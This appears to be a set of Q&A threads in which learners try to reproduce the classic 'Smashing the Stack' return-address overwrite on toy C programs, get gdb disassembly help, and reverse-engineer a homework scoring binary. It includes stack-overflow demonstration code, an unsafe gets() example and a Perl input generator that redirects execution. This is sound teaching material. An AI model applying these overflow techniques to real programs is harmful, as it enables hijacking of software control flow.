I am trying to make the buffer exploitation example (example3.c from http://insecure.org/stf/smashstack.html) work on Debian Lenny 2.6 version. I know the gcc version and the OS version is different than the one used by Aleph One. I have disabled any stack protection mechanisms using -fno-stack-protector and sysctl -w kernel.randomize_va_space=0 arguments. To account for the differences in my setup and Aleph One's I introduced two parameters : offset1 -> Offset from buffer1 variable to the return address and offset2 -> how many bytes to jump to skip a statement. I tried to figure out these parameters by analyzing assembly code but was not successful. So, I wrote a shell script that basically runs the buffer overflow program with simultaneous values of offset1 and offset2 from (1-60). But much to my surprise I am still not able to break this program. It would be great if someone can guide me for the same. I have attached the code and assembly output for consideration. Sorry for the really long post :)
Thanks.
// Modified example3.c from Aleph One paper - Smashing the stack
void function(int a, int b, int c, int offset1, int offset2) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = (int *)buffer1 + offset1;// how far is return address from buffer ?
(*ret) += offset2; // modify the value of return address
}
int main(int argc, char* argv[]) {
int x;
x = 0;
int offset1 = atoi(argv[1]);
int offset2 = atoi(argv[2]);
function(1,2,3, offset1, offset2);
x = 1; // Goal is to skip this statement using buffer overflow
printf("X : %d\n",x);
return 0;
}
-----------------
// Execute the buffer overflow program with varying offsets
#!/bin/bash
for ((i=1; i<=60; i++))
do
for ((j=1; j<=60; j++))
do
echo "`./test $i $j`"
done
done
-- Assembler output
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c2 <main+0>: lea 0x4(%esp),%ecx
0x080483c6 <main+4>: and $0xfffffff0,%esp
0x080483c9 <main+7>: pushl -0x4(%ecx)
0x080483cc <main+10>: push %ebp
0x080483cd <main+11>: mov %esp,%ebp
0x080483cf <main+13>: push %ecx
0x080483d0 <main+14>: sub $0x24,%esp
0x080483d3 <main+17>: movl $0x0,-0x8(%ebp)
0x080483da <main+24>: movl $0x3,0x8(%esp)
0x080483e2 <main+32>: movl $0x2,0x4(%esp)
0x080483ea <main+40>: movl $0x1,(%esp)
0x080483f1 <main+47>: call 0x80483a4 <function>
0x080483f6 <main+52>: movl $0x1,-0x8(%ebp)
0x080483fd <main+59>: mov -0x8(%ebp),%eax
0x08048400 <main+62>: mov %eax,0x4(%esp)
0x08048404 <main+66>: movl $0x80484e0,(%esp)
0x0804840b <main+73>: call 0x80482d8 <printf#plt>
0x08048410 <main+78>: mov $0x0,%eax
0x08048415 <main+83>: add $0x24,%esp
0x08048418 <main+86>: pop %ecx
0x08048419 <main+87>: pop %ebp
0x0804841a <main+88>: lea -0x4(%ecx),%esp
0x0804841d <main+91>: ret
End of assembler dump.
(gdb) disassemble function
Dump of assembler code for function function:
0x080483a4 <function+0>: push %ebp
0x080483a5 <function+1>: mov %esp,%ebp
0x080483a7 <function+3>: sub $0x20,%esp
0x080483aa <function+6>: lea -0x9(%ebp),%eax
0x080483ad <function+9>: add $0x30,%eax
0x080483b0 <function+12>: mov %eax,-0x4(%ebp)
0x080483b3 <function+15>: mov -0x4(%ebp),%eax
0x080483b6 <function+18>: mov (%eax),%eax
0x080483b8 <function+20>: lea 0x7(%eax),%edx
0x080483bb <function+23>: mov -0x4(%ebp),%eax
0x080483be <function+26>: mov %edx,(%eax)
0x080483c0 <function+28>: leave
0x080483c1 <function+29>: ret
End of assembler dump.
The disassembly for function you provided seems to use hardcoded values of offset1 and offset2, contrary to your C code.
The address for ret should be calculated using byte/char offsets: ret = (int *)(buffer1 + offset1), otherwise you'll get hit by pointer math (especially in this case, when your buffer1 is not at a nice aligned offset from the return address).
offset1 should be equal to 0x9 + 0x4 (the offset used in lea + 4 bytes for the push %ebp). However, this can change unpredictably each time you compile - the stack layout might be different, the compiler might create some additional stack alignment, etc.
offset2 should be equal to 7 (the length of the instruction you're trying to skip).
Note that you're getting a little lucky here - the function uses the cdecl calling convention, which means the caller is responsible for removing arguments off the stack after returning from the function, which normally looks like this:
push arg3
push arg2
push arg1
call func
add esp, 0Ch ; remove as many bytes as were used by the pushed arguments
Your compiler chose to combine this correction with the one after printf, but it could also decide to do this after your function call. In this case the add esp, <number> instruction would be present between your return address and the instruction you want to skip - you can probably imagine that this would not end well.
Related
I am following this buffer overflow tutorial: https://insecure.org/stf/smashstack.html
I want to make this program work in Windows
#include <stdio.h>
void f(int x, int y)
{
char buffer1[5];
char buffer2[10];
int *ret = buffer1 + 12;
(*ret) += 7;
}
int main()
{
int x;
x = 10;
f(1, 2);
x = 21;
printf("%d\n", x);
return 0;
}
This program attempts to modify the return address of function f so that this line x = 21; is ignored in main (ie. the program jumps directly to executing printf).
For some reason this trivial buffer overflow attack didn't work in Windows and I am not sure why.
This is how I understand the stack layout after the function f is called in x64 machines
high address
...
return address (4 bytes)
saved frame pointer (4 bytes)
1 (first argument for f; 4 bytes)
2 (second argument for f; 4 bytes)
buffer1 (1*8=8 bytes)
buffer2 (1*12=12 bytes)
...
low address
Using gdb, I get the following disassembly
Dump of assembler code for function main:
0x0000000000401590 <+0>: push %rbp
0x0000000000401591 <+1>: mov %rsp,%rbp
0x0000000000401594 <+4>: sub $0x30,%rsp
0x0000000000401598 <+8>: callq 0x401690 <__main>
0x000000000040159d <+13>: movl $0xa,-0x4(%rbp)
0x00000000004015a4 <+20>: mov $0x2,%edx
0x00000000004015a9 <+25>: mov $0x1,%ecx
0x00000000004015ae <+30>: callq 0x401560 <f>
0x00000000004015b3 <+35>: movl $0x15,-0x4(%rbp)
0x00000000004015ba <+42>: mov -0x4(%rbp),%eax
0x00000000004015bd <+45>: mov %eax,%edx
0x00000000004015bf <+47>: lea 0x2a3a(%rip),%rcx # 0x404000
0x00000000004015c6 <+54>: callq 0x402b70 <printf>
0x00000000004015cb <+59>: mov $0x0,%eax
0x00000000004015d0 <+64>: add $0x30,%rsp
0x00000000004015d4 <+68>: pop %rbp
0x00000000004015d5 <+69>: retq
End of assembler dump.
So in order to get return address in the stack, I must add 4+4+4=12 bytes. From the disassembly, in order to skip x = 21;, I must skip movl $0x15,-0x4(%rbp). So I need to add the additional 42-35=7 bytes to the return address.
Is there anything wrong with my understanding so far?
i am currently working on gdb disassembly to help me understand more detail about the c program so i write a c program:
#include <stdio.h>
void swap(int a, int b){
int temp = a;
a = b;
b = temp;
}
void main(){
int a = 1,b = 2;
swap(a, b);
}
I use gdb and run disass /m main to get those:
(gdb) disass /m main
Dump of assembler code for function main:
8 void main(){
0x0000000000400492 <+0>: push %rbp
0x0000000000400493 <+1>: mov %rsp,%rbp
0x0000000000400496 <+4>: sub $0x10,%rsp
9 int a = 1,b = 2;
0x000000000040049a <+8>: movl $0x1,-0x8(%rbp)
0x00000000004004a1 <+15>: movl $0x2,-0x4(%rbp)
10 swap(a, b);
0x00000000004004a8 <+22>: mov -0x4(%rbp),%edx
0x00000000004004ab <+25>: mov -0x8(%rbp),%eax
0x00000000004004ae <+28>: mov %edx,%esi
0x00000000004004b0 <+30>: mov %eax,%edi
0x00000000004004b2 <+32>: callq 0x400474 <swap>
11 }
0x00000000004004b7 <+37>: leaveq
0x00000000004004b8 <+38>: retq
End of assembler dump.
My question is those -0x8(%rbp) means what?
A memory or a register?
I do know that 1 is store in -0x8(%rbp) and 2 is in -0x4(%rbp), How can i show the value in
thoes kind of 'place' ?
I try to use (gdb) p -0x8(%rbp) but get this:
A syntax error in expression, near `%rbp)'.
Registers in gdb can be referred with the prefix '$'
p *(int *)($rbp - 8)
RBP and RSP most likely refer to memory locations, specifically to stack. Other registers are more or less generic purpose registers and can point to memory too.
It means "the data stored when you subtract eight from the address stored in rbp". Try looking at the stack commands available in gdb: http://www.delorie.com/gnu/docs/gdb/gdb_41.html
The actually meaning of those structures such as -0x8(%rbp) depends on the architecture (or the assembly language). But in this case, -0x8(%rbp) is a memory address, probably value of %rbp minus 8.
In gdb, you can print the value of those memory address by doing something like
info r rbp
p *(int *)(value_of_rbp - 8)
I am trying to reproduce the stackoverflow results that I read from Aleph One's article "smashing the stack for fun and profit"(can be found here:http://insecure.org/stf/smashstack.html).
Trying to overwrite the return address doesn't seem to work for me.
C code:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
//Trying to overwrite return address
ret = buffer1 + 12;
(*ret) = 0x4005da;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
disassembled main:
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004005b0 <+0>: push %rbp
0x00000000004005b1 <+1>: mov %rsp,%rbp
0x00000000004005b4 <+4>: sub $0x10,%rsp
0x00000000004005b8 <+8>: movl $0x0,-0x4(%rbp)
0x00000000004005bf <+15>: mov $0x3,%edx
0x00000000004005c4 <+20>: mov $0x2,%esi
0x00000000004005c9 <+25>: mov $0x1,%edi
0x00000000004005ce <+30>: callq 0x400564 <function>
0x00000000004005d3 <+35>: movl $0x1,-0x4(%rbp)
0x00000000004005da <+42>: mov -0x4(%rbp),%eax
0x00000000004005dd <+45>: mov %eax,%esi
0x00000000004005df <+47>: mov $0x4006dc,%edi
0x00000000004005e4 <+52>: mov $0x0,%eax
0x00000000004005e9 <+57>: callq 0x400450 <printf#plt>
0x00000000004005ee <+62>: leaveq
0x00000000004005ef <+63>: retq
End of assembler dump.
I have hard coded the return address to skip the x=1; code line, I have used a hard coded value from the disassembler(address : 0x4005da). The intent of this exploit is to print 0, but instead it is printing 1.
I have a very strong feeling that "ret = buffer1 + 12;" is not the address of the return address. If this is the case, how can I determine the return address, is gcc allocating more memory between the return address and the buffer.
Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to get the return address and how to use it to write over the old one:
Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:
C code:
void function()
{
char buffer[4];
}
int main()
{
function();
}
Assembly (abridged):
function:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
leave
ret
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
call function
...
There are several tools that you can use to inspect the assembly code. First, of course, is
compiling straight to assembly output from gcc using gcc -S main.c. This can be difficult to read since there are little to no hints for what code corresponds to the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.
The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.
This function function takes the return address and increments 7 to it. The instruction that
the return address originally pointed to is 7 bytes in length, so adding 7 makes the return address point to the instruction immediately after the assignment.
In the example below, I overwrite the return address to skip the instruction x = 1.
simple C program:
void function()
{
char buffer[4];
/* return address is 8 bytes beyond the start of the buffer */
int *ret = buffer + 8;
/* assignment instruction we want to skip is 7 bytes long */
(*ret) += 7;
}
int main()
{
int x = 0;
function();
x = 1;
printf("%d\n",x);
}
Main function (x = 1 at 80483af is seven bytes long):
8048392: 8d4c2404 lea 0x4(%esp),%ecx
8048396: 83e4f0 and $0xfffffff0,%esp
8048399: ff71fc pushl -0x4(%ecx)
804839c: 55 push %ebp
804839d: 89e5 mov %esp,%ebp
804839f: 51 push %ecx
80483a0: 83ec24 sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8 mov -0x8(%ebp),%eax
80483b9: 89442404 mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff call 80482d8 <printf#plt>
80483c9: 83c424 add $0x24,%esp
80483cc: 59 pop %ecx
80483cd: 5d pop %ebp
We know where the return address is and we have demonstrated that changing it can affect the
code that is run. A buffer overflow can do the same thing by using gets and inputing the right character string so that the return address is overwritten with a new address.
In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.
#include <stdio.h>
#include <stdlib.h>
void uncalled()
{
puts("uh oh!");
exit(1);
}
void function()
{
char buffer[4];
gets(buffer);
}
int main()
{
function();
puts("program secure");
}
To run uncalled, inspect the executable using objdump or similar to find the address of the entry point of uncalled. Then append the address to the input buffer in the right place so that it overwrites the old return address. If your computer is little-endian (x86, etc.) , you need to swap the endianness of the address.
In order to do this correctly, I have a simple perl script below, which generates the input that will cause the buffer overflow that will overwrite the return address. It takes two arguments, first it takes the new return address, and second it takes the distance (in bytes) from the beginning of the buffer to the return address location.
#!/usr/bin/perl
print "x"x#ARGV[1]; # fill the buffer
print scalar reverse pack "H*", substr("0"x8 . #ARGV[0] , -8); # swap endian of input
print "\n"; # new line to end gets
You need to examine the stack to determine if buffer1+12 is actually the right address to be modifying. This sort of stuff isn't exactly very portable.
I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:
char buffer1[5] = "1111";
char buffer2[10] = "2222";
You can figure this out by printing out the stack. Add code like this:
int* pESP;
__asm mov pESP, esp
The __asm directive is Visual Studio specific. Once you have the address of the stack you can print it out and see what is in there. Note that the stack will change when you do things or make calls, so you have to save the whole block of memory at once by first copying the memory at the stack address to an array, then you print out the array.
What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS will put guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set a compiler switches to turn all this stuff off.
As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I remove the buffer2 variable, and change buffer1 to 8 bytes so things are more aligned. We will also compile in 32 bit more do make it easier to read the addresses, and turn debugging on(gcc -m32 -g).
void function(int a, int b, int c) {
char buffer1[8];
char *ret;
so let's print the address of buffer1:
(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40
then let's print a bit past that and see what's on the stack.
(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000 0x00000000 0xfecf25c3 0x00000003
0xbffffa50: 0x00000000 0xbffffb50 0xbffffa88 0x00001f3b
0xbffffa60: 0x00000001 0x00000002 0x00000003 0x00000000
0xbffffa70: 0x00000003 0x00000002 0x00000001 0x00001efc
Do a backtrace to see where the return address should be pointing:
(gdb) bt
#0 function (a=1, b=2, c=3) at foo.c:18
#1 0x00001f3b in main () at foo.c:26
and sure enough, there it is at 0xbffffa5b:
(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf
The code below is from the well-known article Smashing The Stack For Fun And Profit.
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret)+=8;
}
void main() {
int x;
x=0;
function(1,2,3);
x=1;
printf("%d\n",x);
}
I think I must explain my target of this code.
The stack model is below. The number below the word is the number of bytes of the variable in the stack. So, if I want to rewrite RET to skip the statement I want, I calculate the offset from buffer1 to RET is 8+4=12. Since the architecture is x86 Linux.
buffer2 buffer1 BSP RET a b c
(12) (8) (4) (4) (4) (4) (4)
I want to skip the statement x=1; and let printf() output 0 on the screen.
I compile the code with:
gcc stack2.c -g
and run it in gdb:
gdb ./a.out
gdb gives me the result like this:
Program received signal SIGSEGV, Segmentation fault.
main () at stack2.c:17
17 x = 1;
I think Linux uses some mechanism to protect against stack overflow. Maybe Linux stores the RET address in another place and compares the RET address in the stack before functions return.
And what is the detail about the mechanism? How should I rewrite the code to make the program output 0?
OK,the disassemble code is below.It comes form the output of gdb since I think is more easy to read for you.And anybody can tell me how to paste a long code sequence?Copy and paste one by one makes me too tired...
Dump of assembler code for function main:
0x08048402 <+0>: push %ebp
0x08048403 <+1>: mov %esp,%ebp
0x08048405 <+3>: sub $0x10,%esp
0x08048408 <+6>: movl $0x0,-0x4(%ebp)
0x0804840f <+13>: movl $0x3,0x8(%esp)
0x08048417 <+21>: movl $0x2,0x4(%esp)
0x0804841f <+29>: movl $0x1,(%esp)
0x08048426 <+36>: call 0x80483e4 <function>
0x0804842b <+41>: movl $0x1,-0x4(%ebp)
0x08048432 <+48>: mov $0x8048520,%eax
0x08048437 <+53>: mov -0x4(%ebp),%edx
0x0804843a <+56>: mov %edx,0x4(%esp)
0x0804843e <+60>: mov %eax,(%esp)
0x08048441 <+63>: call 0x804831c <printf#plt>
0x08048446 <+68>: mov $0x0,%eax
0x0804844b <+73>: leave
0x0804844c <+74>: ret
Dump of assembler code for function function:
0x080483e4 <+0>: push %ebp
0x080483e5 <+1>: mov %esp,%ebp
0x080483e7 <+3>: sub $0x14,%esp
0x080483ea <+6>: lea -0x9(%ebp),%eax
0x080483ed <+9>: add $0x3,%eax
0x080483f0 <+12>: mov %eax,-0x4(%ebp)
0x080483f3 <+15>: mov -0x4(%ebp),%eax
0x080483f6 <+18>: mov (%eax),%eax
0x080483f8 <+20>: lea 0x8(%eax),%edx
0x080483fb <+23>: mov -0x4(%ebp),%eax
0x080483fe <+26>: mov %edx,(%eax)
0x08048400 <+28>: leave
0x08048401 <+29>: ret
I check the assemble code and find some mistake about my program,and I have rewrite (*ret)+=8 to (*ret)+=7,since 0x08048432 <+48>minus0x0804842b <+41> is 7.
Because that article is from 1996 and the assumptions are incorrect.
Refer to "Smashing The Modern Stack For Fun And Profit"
http://www.ethicalhacker.net/content/view/122/24/
From the above link:
However, the GNU C Compiler (gcc) has evolved since 1998, and as a result, many people are left wondering why they can't get the examples to work for them, or if they do get the code to work, why they had to make the changes that they did.
The function function overwrites some place of the stack outside of its own, which is this case is the stack of main. What it overwrites I don't know, but it causes the segmentation fault you see. It might be some protection employed by the operating system, but it might as well be the generated code just does something wrong when wrong value is at that position on the stack.
This is a really good example of what may happen when you write outside of your allocated memory. It might crash directly, it might crash somewhere completely different, or if might not crash at all but instead just do some calculation wrong.
Try ret = buffer1 + 3;
Explanation: ret is an integer pointer; incrementing it by 1 adds 4 bytes to the address on 32bit machines.
This question is unlikely to help any future visitors; it is only relevant to a small geographic area, a specific moment in time, or an extraordinarily narrow situation that is not generally applicable to the worldwide audience of the internet. For help making this question more broadly applicable, visit the help center.
Closed 11 years ago.
I need your help. Here is the source code of my program. I need to understand what manipulations are being done by the score1, score2, score3 and score4 functions.
1 #include <stdio.h>
2 #include <string.h>
3 #include <stdlib.h>
4 #include <sys/types.h>
5 #include <sys/stat.h>
6 #include <pwd.h>
7 #include <unistd.h>
8
9 #include "score.h"
10
(gdb)
11 int main(int argc, char *argv[])
12 {
13 int i, j, k, l, s;
14 struct passwd *pw;
15 char cmd[1024];
16
17 /* Make sure that we have exactly 5 arguments: the name of the executable, and 4 numbers */
18 if (argc != 5) {
19 printf("Usage: %s i j k l\n where i,j,k,l are integers.\n Try to get as high a score as you can.\n", argv[0]);
20 exit(8);
(gdb)
21 }
22
23 initialize();
24
25 /* Convert the inputs to ints */
26 i = atoi(argv[1]);
27 j = atoi(argv[2]);
28 k = atoi(argv[3]);
29 l = atoi(argv[4]);
30
(gdb)
31 printf("You entered the integers %d, %d, %d, and %d.\n", i, j, k, l);
32 s = score1(i) + score2(j) + score3(k) + score4(l);
33
34 printf("Your score is %d.\n", s);
35 if (s > 0) {
36 pw = getpwuid(getuid());
37
38 printf("Thank you!\n");
40 system(cmd);
I have started disassemble the code like the following:
(gdb) disas score1
Dump of assembler code for function score1:
0x080488b0 <score1+0>: push %ebp
0x080488b1 <score1+1>: mov %esp,%ebp
0x080488b3 <score1+3>: cmpl $0xe1e4,0x8(%ebp)
0x080488ba <score1+10>: setne %al
0x080488bd <score1+13>: movzbl %al,%eax
0x080488c0 <score1+16>: sub $0x1,%eax
0x080488c3 <score1+19>: and $0xa,%eax
0x080488c6 <score1+22>: pop %ebp
0x080488c7 <score1+23>: ret
(gdb) disas score2
Dump of assembler code for function score2:
0x080488c8 <score2+0>: push %ebp
0x080488c9 <score2+1>: mov %esp,%ebp
0x080488cb <score2+3>: mov 0x8049f88,%eax
0x080488d0 <score2+8>: sub $0x2,%eax
0x080488d3 <score2+11>: mov %eax,0x8049f88
0x080488d8 <score2+16>: cmp 0x8(%ebp),%eax
0x080488db <score2+19>: setne %al
0x080488de <score2+22>: movzbl %al,%eax
0x080488e1 <score2+25>: sub $0x1,%eax
0x080488e4 <score2+28>: and $0xa,%eax
0x080488e7 <score2+31>: pop %ebp
0x080488e8 <score2+32>: ret
(gdb) disas score3
Dump of assembler code for function score3:
0x080488e9 <score3+0>: push %ebp
0x080488ea <score3+1>: mov %esp,%ebp
0x080488ec <score3+3>: mov 0x8(%ebp),%eax
0x080488ef <score3+6>: and $0xf,%eax
0x080488f2 <score3+9>: mov 0x8048e00(,%eax,4),%eax
0x080488f9 <score3+16>: pop %ebp
0x080488fa <score3+17>: ret
(gdb) disas score4
Dump of assembler code for function score4:
0x080488fb <score4+0>: push %ebp
0x080488fc <score4+1>: mov %esp,%ebp
0x080488fe <score4+3>: push %ebx
0x080488ff <score4+4>: mov 0x8(%ebp),%eax
0x08048902 <score4+7>: movzwl %ax,%edx
0x08048905 <score4+10>: mov %eax,%ecx
0x08048907 <score4+12>: shr $0x10,%ecx
0x0804890a <score4+15>: lea 0x0(,%edx,8),%eax
0x08048911 <score4+22>: sub %edx,%eax
0x08048913 <score4+24>: cmp %ecx,%eax
0x08048915 <score4+26>: jne 0x8048920 <score4+37>
0x08048917 <score4+28>: mov $0x8000ffff,%ebx
0x0804891c <score4+33>: test %edx,%ecx
0x0804891e <score4+35>: jne 0x8048940 <score4+69>
0x08048920 <score4+37>: mov %ecx,%eax
0x08048922 <score4+39>: xor %edx,%eax
0x08048924 <score4+41>: cmp $0xf00f,%eax
0x08048929 <score4+46>: jne 0x804893b <score4+64>
0x0804892b <score4+48>: mov %ecx,%eax
0x0804892d <score4+50>: or %edx,%eax
0x0804892f <score4+52>: mov $0xa,%ebx
0x08048934 <score4+57>: cmp $0xf42f,%eax
---Type <return> to continue, or q <return> to quit---
0x08048939 <score4+62>: je 0x8048940 <score4+69>
0x0804893b <score4+64>: mov $0x0,%ebx
0x08048940 <score4+69>: mov %ebx,%eax
0x08048942 <score4+71>: pop %ebx
0x08048943 <score4+72>: pop %ebp
0x08048944 <score4+73>: ret
I've started examining score2.
What I have done is:
(
gdb) x 0x8049f88
0x8049f88 <secret>: "Чй"
(gdb) disas 0x8049f88
Dump of assembler code for function secret:
0x08049f88 <secret+0>: dec %dl
0x08049f8a <secret+2>: add %al,(%eax)
End of assembler dump.
And I'm lost here.
Here's what I think happens so far (See comments):
(gdb) disas score2
Dump of assembler code for function score2:
0x080488c8 <score2+0>: push %ebp
0x080488c9 <score2+1>: mov %esp,%ebp 'Copy %esp into %ebp
0x080488cb <score2+3>: mov 0x8049f88,%eax 'executing: decrement and add
0x080488d0 <score2+8>: sub $0x2,%eax ' subtract $0x2 from %eax (How can I figure out what $0x2
0x080488d3 <score2+11>: mov %eax,0x8049f88 'Have no idea what this does
0x080488d8 <score2+16>: cmp 0x8(%ebp),%eax compare of %ebp to %eax (why %ebp has 0x8 preceding it?)
0x080488db <score2+19>: setne %al 'I have no idea what this does
0x080488de <score2+22>: movzbl %al,%eax
0x080488e1 <score2+25>: sub $0x1,%eax
0x080488e4 <score2+28>: and $0xa,%eax
0x080488e7 <score2+31>: pop %ebp
0x080488e8 <score2+32>: ret
If you could help me understand what kind of transformations score2 performs to an integer and what commands can I run in gdb that could help me, I would really appreciate it and would try to figure rest of it(score1-3) by myself. I'm just lost here.
There's only really 2 things you need to know to understand a disassembly. The first thing you need to know is all the instructions and addressing modes support by the CPU and how they work. The second thing is the syntax used by the assembler/disassembler. Without being familiar with either of these things you will get nowhere.
For an example of "you will get nowhere", here's score2:
0x080488c8 <score2+0>: push %ebp ;Save EBP
0x080488c9 <score2+1>: mov %esp,%ebp ;EBP = address of stack frame
0x080488cb <score2+3>: mov 0x8049f88,%eax ;EAX = the data at address 0x8049f88
0x080488d0 <score2+8>: sub $0x2,%eax ;EAX = EAX - 2
0x080488d3 <score2+11>: mov %eax,0x8049f88 ;The value at address 0x8049f88 = eax
0x080488d8 <score2+16>: cmp 0x8(%ebp),%eax ;Compare the int at offset 8 in the stack frame with EAX
0x080488db <score2+19>: setne %al ;If the int at offset 8 in the stack frame wasn't equal to EAX, set AL to 0, otherwise set AL to 1
0x080488de <score2+22>: movzbl %al,%eax ;Zero-extend AL to EAX (so EAX = 0 or 1)
0x080488e1 <score2+25>: sub $0x1,%eax ;Decrease EAX (so EAX = -1 or 0)
0x080488e4 <score2+28>: and $0xa,%eax ;EAX = EAX AND 0x0A (so EAX = 0xA or 0)
0x080488e7 <score2+31>: pop %ebp ;Restore previous EBP
0x080488e8 <score2+32>: ret ;Return
Converting back into C, this might look something like:
int score2(int something) {
some_global_int -= 2;
if(some_global_int == something) return 0;
else return 0x0A;
}
Of course I only slapped this together in 5 minutes, and haven't double checked anything or tested anything, so it could be wrong.
After reading the above "score2" code, are you any closer to understanding the disassembly of any of the other functions?
Based on your initial attempt at commenting score2, you should either ask someone to do all the work for you (and learn nothing, and have no way of knowing if that person is right or wrong), or ask for the best place to learn 80x86 assembly (and AT&T syntax).
I'm assuming you're given some kind of compiled library with the score functions in it, and you're trying to reverse engineer it as some kind of homework project. In that case, I suggest you start familiarizing yourself with the standard C calling convention cdecl.
Basically, esp points to the stack, on which the arguments to the function are pushed before it's called, so a C function first moves esp into ebp and then it can access the arguments by subtracting values from ebp and dereferencing the resulting address. It uses ebp for this purpose so it can still modify esp in order to add more local variables on the stack without losing track of where the arguments are stored.
Anyway, here's an overview of score2 to help get you started:
(gdb) disas score2
Dump of assembler code for function score2:
0x080488c8 <score2+0>: push %ebp
0x080488c9 <score2+1>: mov %esp,%ebp ; This just saves a copy of the top of our stack to read arguments with
0x080488cb <score2+3>: mov 0x8049f88,%eax ; Load a value from a memory location (the number is a memory address, probably to a global variable)
0x080488d0 <score2+8>: sub $0x2,%eax ; Subtract 2
0x080488d3 <score2+11>: mov %eax,0x8049f88 ; Store the new value into the same memory location
0x080488d8 <score2+16>: cmp 0x8(%ebp),%eax ; Compare the first argument of the function to that value
0x080488db <score2+19>: setne %al ; Sets the lower byte of eax to 1 if they don't match
0x080488de <score2+22>: movzbl %al,%eax ; Sets al to eax, zeroing the upper bytes so eax is just 1 or 0 now
0x080488e1 <score2+25>: sub $0x1,%eax ; Subtract 1 from eax
0x080488e4 <score2+28>: and $0xa,%eax ; eax = eax & 0xa
0x080488e7 <score2+31>: pop %ebp
0x080488e8 <score2+32>: ret ; Return eax
So that means there is some kind of global variable stored at 0x8049f88
(let's call it x), and score2 literally translates to:
int score2(int n) {
x -= 2;
if (n == x)
n = 1;
else
n = 0;
n--;
n = n & 0xa;
return n;
}
EDIT: Brendan's example is the same, but probably looks more like the original code. Look over it a few times and compare it to the assembly output.
The next step is now to see what's in the variable at 0x8049f88. Try running awatch *0x8049f88 inside of gdb to make it stop on every access and also print *0x8049f88 to see what's stored there.
You should also run set disassembly-flavor intel if you're not too familiar with assembly language. The syntax will then match the examples you're more likely to find on the Internet.
I presume you don't have access to the source code of the functions, and for the puzzle or homework you are supposed to try to find numbers to get a big score. You probably should edit your question to display contents of score.h, or just the relevant portions if it's quite lengthy. Also, note that disassembly at 0x8049f88 doesn't make sense. Instead use gdb's x command to display that location, and edit accordingly.
While you can attack the problem via disassembly (as above) you can also try using a different main program, that reports the results of individual score?() calls, and that loops some of them through a series of values looking for big values.
With score2(), looping within main() won't work, because score2() subtracts 2 from a word in memory. So, if you wanted to try out a lot of inputs, you'd need to call the program with different arguments in a shell code loop. Eg, if you are using bash:
for i in {1..1000}; do testScore2 $i; done
where testScore2 is a main program that only runs score2() with its parameter and reports the result.
Of course, because score2() can produce only two different results, as explained in detail in two previous answers, it won't actually make sense to test score2() with more than two argument values. I showed the shell code above because you might want to use such a technique with some of the other score functions.